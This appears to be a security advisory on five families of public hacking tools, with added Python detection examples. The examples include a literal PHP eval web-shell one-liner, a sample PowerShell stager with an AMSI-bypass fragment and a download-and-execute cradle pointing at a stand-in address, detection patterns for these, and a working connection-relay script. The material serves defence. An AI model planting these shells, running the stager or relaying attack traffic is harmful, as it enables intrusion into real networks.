The widespread availability of these tools means that they can be used by anyone from amateur hackers through to organised crime groups and governments.
The tools detailed fall into five categories: Remote Access Tools, Web Shells, Credential Stealers, Lateral Movement Frameworks, and Command and Control Obfuscators.
Remote Access Tools
A Remote Access Tool (RAT) is a program which, once installed on a victim's machine, gives its operator remote administrative control. In a malicious context, a RAT typically lets the actor upload and download files, execute commands, log keystrokes and/or record the user's screen.
An example of a malicious RAT is JBiFrost, which has undergone several name changes including Adwind and JSocket. This RAT is primarily delivered through emails as an attachment, usually an invoice notice, request for quotation, remittance notice, shipment notification, payment notice or with a link to a file hosting service.
Past infections have exfiltrated intellectual property, banking credentials and Personally Identifiable Information (PII). Machines infected with JBiFrost can also be used to take part in botnets to carry out Distributed Denial of Service (DDoS) attacks. JBiFrost can also allow a malicious actor to install additional malicious software.
Since 2015 this RAT has been offered under a software-as-a-service model. This has lowered the barrier to entry and allowed a wider range of cyber criminals and low-skilled actors to use the tool; its capabilities could equally be adapted for use in state-sponsored intrusions.
Web Shells
Web shells are malicious scripts which are uploaded to a target host after an initial compromise and grant an actor persistent remote access to that host, and through it into the network. Once this access is established, web shells can facilitate lateral movement within the network.
An example of a commonly used web shell is China Chopper, a well-documented and publicly available web shell that has seen widespread use since 2012.
Capabilities include uploading files to and downloading files from the victim, execution of arbitrary commands, using the operating system's own file-retrieval tools to fetch further files onto the target, and filesystem modification. The server-side component is deliberately small, often a single line, so that it is easy to drop into an existing web directory and hard to spot among legitimate scripts.
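As an added example (not code from the page, nor from any of the tools it describes): a Python scanner that looks for the publicly documented one-line server side of a China Chopper-style shell in a web root, and a companion check over web server access logs for the traffic shape a shell client produces, namely repeated POSTs to a script that is never requested with GET and carries no referrer. The rule names, the sample log lines, the temporary web root and the helper names are constructed for this example; the shell one-liners and the "MSIE 6.0" client user agent follow published write-ups of the tool.

```python
"""Find China Chopper-style one-line web shells on disk and the
POST-only traffic pattern their client leaves in access logs."""
import os
import re
import tempfile

# Publicly documented server-side forms: the entire shell is one statement
# that evaluates whatever the client sends in a named POST parameter.
SHELL_RULES = {
    "php_eval_post": re.compile(r"@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[", re.I),
    "php_assert_post": re.compile(r"assert\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[", re.I),
    "aspx_eval_request": re.compile(r"eval\s*\(\s*Request\.Item\s*\[", re.I),
}
SCRIPT_EXTS = (".php", ".phtml", ".asp", ".aspx", ".ashx", ".jsp")


def scan_content(text):
    """Return the names of the shell rules that match a script body."""
    return [name for name, rx in SHELL_RULES.items() if rx.search(text)]


def scan_webroot(root):
    """Walk a web root; return [(path, [rule names])] for every matching script."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(SCRIPT_EXTS):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "r", errors="ignore") as fh:
                rules = scan_content(fh.read())
            if rules:
                hits.append((path, rules))
    return hits


# Combined log format: ip - - [time] "METHOD path HTTP/x" status bytes "referer" "ua"
LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def suspicious_post_targets(log_lines):
    """Script paths that only ever receive referrer-less POSTs and are never
    fetched with GET: the shape of a shell driven by a dedicated client."""
    posts, gets = {}, set()
    for line in log_lines:
        m = LOG_RX.match(line)
        if not m:
            continue
        path = m.group("path").split("?")[0]
        if not path.lower().endswith(SCRIPT_EXTS):
            continue
        if m.group("method") == "GET":
            gets.add(path)
        elif m.group("method") == "POST" and m.group("ref") in ("", "-"):
            posts[path] = posts.get(path, 0) + 1
    return sorted(p for p in posts if p not in gets)


# Constructed sample log: normal browsing plus a shell being driven on img.php.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2018:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2018:13:55:40 +0000] "POST /login.php HTTP/1.1" 302 0 "http://www.example.com/index.php" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2018:14:02:11 +0000] "POST /uploads/img.php HTTP/1.1" 200 412 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.7 - - [10/Oct/2018:14:02:19 +0000] "POST /uploads/img.php HTTP/1.1" 200 2380 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
]


def demo():
    """Build a throwaway web root with one benign script and one constructed
    shell, scan it, and return the hits by file name."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>")
    with open(os.path.join(root, "img.php"), "w") as fh:
        fh.write("<?php @eval($_POST['password']);?>")  # the documented PHP one-liner
    return [(os.path.basename(p), r) for p, r in scan_webroot(root)]


if __name__ == "__main__":
    print(demo())
    print(suspicious_post_targets(SAMPLE_LOG))
```

The file scan catches only the documented literal forms; operators who obfuscate the one-liner will slip past it, which is why the log check, which does not care what the shell looks like, is the more durable of the two signals.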
Credential Stealers
Credential stealing tools are designed to let a malicious actor collect the credentials of other users who are logged into a targeted machine, which can then be reused to gain access to other machines on the network.
Though not originally written as a hacking tool, Mimikatz has become a common tool used by many actors to obtain credentials from networks. It is typically run once access to a host has been gained and the actor wishes to move through the internal network, most commonly by reading plaintext passwords, hashes and Kerberos tickets out of the memory of the LSASS process.
Widespread use of this tool has been observed amongst organised crime and state-sponsored groups.
Mimikatz was used in conjunction with other hacking tools in the 2017 NotPetya and BadRabbit ransomware attacks to extract administrator credentials held on thousands of computers and enable the ransomware to propagate throughout networks.
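Reading credentials out of LSASS requires opening a handle to that process with read access, which Sysmon records as Event ID 10 (ProcessAccess). As an added example, not code from the page or from Mimikatz itself, the Python below triages constructed Sysmon records for that pattern: a non-allowlisted process requesting an access mask with PROCESS_VM_READ set on lsass.exe, or one of the masks repeatedly reported for Mimikatz in public detection rules, plus an unbacked ("UNKNOWN") frame in the call trace. The sample events, the source allowlist and the function names are assumptions for the example; the allowlist in particular must be tuned per environment.

```python
"""Triage Sysmon Event ID 10 (ProcessAccess) records for handle opens on
lsass.exe that look like credential dumping."""

# Bits of the Windows process access mask that matter here.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Access masks repeatedly reported for Mimikatz sekurlsa:: modules in public
# detection rules. Anything else with VM_READ set is still flagged below.
KNOWN_DUMP_MASKS = {0x1010, 0x1410, 0x1438, 0x143A, 0x1FFFFF}

# Processes that legitimately read LSASS memory on a typical host. This list
# is an assumption for the example and must be tuned per environment.
SOURCE_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def classify_event(ev):
    """Return None for a benign record, or a short reason string if the
    record looks like a credential dump against lsass.exe."""
    if ev.get("EventID") != 10:
        return None
    if not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
        return None
    src = ev["SourceImage"].lower()
    if src in SOURCE_ALLOWLIST:
        return None
    granted = int(ev["GrantedAccess"], 16)   # Sysmon logs the mask as hex text
    reasons = []
    if granted in KNOWN_DUMP_MASKS:
        reasons.append("known credential-dump access mask 0x%X" % granted)
    elif granted & PROCESS_VM_READ:
        reasons.append("PROCESS_VM_READ on lsass (0x%X)" % granted)
    if "UNKNOWN" in ev.get("CallTrace", ""):
        # A frame not backed by any module is typical of injected or
        # reflectively loaded code driving the handle open.
        reasons.append("call trace contains unbacked code (UNKNOWN)")
    return "; ".join(reasons) or None


def triage(events):
    """Return [(SourceImage, reason)] for every suspicious record."""
    out = []
    for ev in events:
        reason = classify_event(ev)
        if reason:
            out.append((ev["SourceImage"], reason))
    return out


# Constructed sample: a normal csrss open, a Task Manager query, a dump from
# a binary in a temp directory, and an unrelated process-creation event.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\csrsrv.dll+3b1f"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\Taskmgr.exe+2b3c1"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\mk.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c584|UNKNOWN(000001A5D7C30A0B)"},
    {"EventID": 1, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\mk.exe",
     "TargetImage": "", "GrantedAccess": "0x0", "CallTrace": ""},
]


if __name__ == "__main__":
    for src, why in triage(SAMPLE_EVENTS):
        print(src, "->", why)
```

On a real host the same signal is only as good as the allowlist; a better long-term control is to deny the handle in the first place with LSA Protection (RunAsPPL) or Credential Guard, so that the event never needs to be triaged.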
Lateral Movement Frameworks
Lateral movement frameworks allow an actor to move around a network after gaining initial access.
PowerShell Empire is a tool commonly used by malicious actors, although it was designed as a legitimate penetration testing tool in 2015.
The framework gives the actor the ability to escalate privileges, harvest credentials, exfiltrate information and move laterally across a network, with agents that run entirely in PowerShell so that no new binary needs to be written to disk. It has become increasingly popular among state actors and organised crime groups, and has recently been observed in a number of global incidents across a wide range of sectors.
In early 2018, an unknown actor used Winter Olympics themed socially engineered emails and malicious attachments in a spear phishing campaign targeting several South Korean organisations.
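Empire-style agents are usually started from a one-line PowerShell launcher: a hidden window, no profile, and a base64-encoded (UTF-16LE) command that downloads and evaluates the stager. As an added example, not code from the page or from the Empire project, the Python below decodes the -EncodedCommand argument from a process command line and scores it for the indicators such a launcher carries. The sample command lines, the indicator names and the scoring threshold are constructed for the example; the AMSI-bypass and download-cradle fragments in the sample script follow the shape documented in public analyses of Empire stagers and are not taken from the page.

```python
"""Decode PowerShell -EncodedCommand launchers from process command lines
and score them for the indicators an Empire-style stager carries."""
import base64
import re

# Launch flags (short and long forms) that a stager sets to stay quiet.
QUIET_FLAGS = {"-nop", "-noprofile", "-noni", "-noninteractive", "-sta"}
HIDDEN_WINDOW_RX = re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b")

# Content indicators checked against the decoded script.
INDICATORS = {
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadData", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "amsi_tamper": re.compile(r"AmsiUtils|amsiInitFailed", re.I),
    "char_join_obfuscation": re.compile(r"\[char\[\]\]|-join", re.I),
}


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand
    (any unambiguous prefix, e.g. -e, -enc), else None. Assumes the argument
    is whitespace-separated, which holds for base64 payloads."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if len(tok) >= 2 and "-encodedcommand".startswith(tok.lower()):
            try:
                return base64.b64decode(toks[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def encode_command(script):
    """Produce the UTF-16LE base64 form PowerShell expects (used for the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def score_launcher(cmdline):
    """Return (score, [hit names]); a score of 3 or more is worth an analyst's look."""
    hits = []
    low = cmdline.lower()
    for tok in low.split():
        if tok in QUIET_FLAGS:
            hits.append(tok)
    if HIDDEN_WINDOW_RX.search(low):
        hits.append("hidden_window")
    script = decode_encoded_command(cmdline)
    if script is not None:
        hits.append("encoded_command")
        for name, rx in INDICATORS.items():
            if rx.search(script):
                hits.append(name)
    return len(hits), hits


# Constructed sample script mimicking the shape of a stager: AMSI tamper,
# WebClient download cradle and IEX of the result. The URL is a TEST-NET address.
SAMPLE_SCRIPT = (
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')|?{$_}|"
    "%{$_.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)};"
    "$wc=New-Object System.Net.WebClient;$wc.Headers.Add('User-Agent','Mozilla/5.0');"
    "IEX $wc.DownloadString('http://198.51.100.7/login/process.php')"
)
SAMPLE_CMDLINE = "powershell -noP -sta -w 1 -enc " + encode_command(SAMPLE_SCRIPT)
BENIGN_CMDLINE = "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"


if __name__ == "__main__":
    print(score_launcher(SAMPLE_CMDLINE))
    print(score_launcher(BENIGN_CMDLINE))
```

Scoring on the decoded content rather than on the base64 text is the point: the encoded blob differs on every deployment, while the cradle, the AMSI tamper and the quiet launch flags are what the stager needs in order to work.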
Command and Control Obfuscators
Malicious cyber actors will typically want to disguise their location when compromising a target. They may use generic privacy tools such as Tor, or more specific tools that relay their traffic through intermediate hosts so that the victim only ever sees the last hop.
HUC Packet Transmitter (HTran) is a tool used to proxy connections. It has been freely available on the internet since at least 2009 and is designed to obfuscate an adversary’s communications with victim networks.
The use of HTran has been regularly observed in compromises of both government and industry targets.
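The relay behaviour the page describes, as an added example in Python rather than the tool's own code: a loopback forwarder that accepts a connection on one port and copies bytes in both directions to a fixed next hop, which is what a relay host between an operator and a victim network does. The "victim" echo server, the payload and the function names are the example's own; nothing here reproduces HTran's implementation, only the forwarding pattern.

```python
"""Minimal connection relay: listen on one port and forward every byte to
a fixed next hop, so the far end only ever sees the relay's address."""
import selectors
import socket
import threading


def open_listener():
    """Bind to a loopback ephemeral port; return (socket, port)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("127.0.0.1", 0))
    s.listen(1)
    return s, s.getsockname()[1]


def relay_once(listener, target):
    """Accept one client, connect onward to target and shuttle bytes both
    ways until either side closes. Returns (client->target, target->client)
    byte counts."""
    client, _ = listener.accept()
    upstream = socket.create_connection(target)
    peer = {client: upstream, upstream: client}
    sent = {client: 0, upstream: 0}
    sel = selectors.DefaultSelector()
    sel.register(client, selectors.EVENT_READ)
    sel.register(upstream, selectors.EVENT_READ)
    live = True
    while live:
        for key, _ in sel.select():
            data = key.fileobj.recv(4096)
            if not data:          # one leg hung up: tear down both legs
                live = False
                break
            peer[key.fileobj].sendall(data)
            sent[key.fileobj] += len(data)
    sel.close()
    client.close()
    upstream.close()
    listener.close()
    return sent[client], sent[upstream]


def echo_once(listener):
    """Stand-in for the victim host: echo one connection's bytes back."""
    conn, _ = listener.accept()
    while True:
        data = conn.recv(4096)
        if not data:
            break
        conn.sendall(data)
    conn.close()
    listener.close()


def demo(payload=b"hello"):
    """operator -> relay -> victim, all on loopback. Returns the bytes the
    operator got back and the relay's per-direction byte counts."""
    victim_sock, victim_port = open_listener()
    relay_sock, relay_port = open_listener()
    result = {}
    threading.Thread(target=echo_once, args=(victim_sock,), daemon=True).start()
    relay = threading.Thread(
        target=lambda: result.setdefault("counts", relay_once(relay_sock, ("127.0.0.1", victim_port))),
        daemon=True,
    )
    relay.start()
    operator = socket.create_connection(("127.0.0.1", relay_port))
    operator.sendall(payload)
    got = b""
    while len(got) < len(payload):
        chunk = operator.recv(4096)
        if not chunk:
            break
        got += chunk
    operator.close()
    relay.join(timeout=5)
    return got, result.get("counts")


if __name__ == "__main__":
    print(demo())
```

From the victim's side the connection originates at the relay, which is why logs of a compromised host often lead investigators only as far as another compromised host; chaining several relays compounds the effect.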
Detection and Prevention Measures
Enhancing the security of a network prevents, or reduces the effectiveness of, a wide range of cyber threats, including the tools listed above. The Australian Signals Directorate publishes the Essential Eight, a list of eight essential strategies to mitigate cyber security incidents.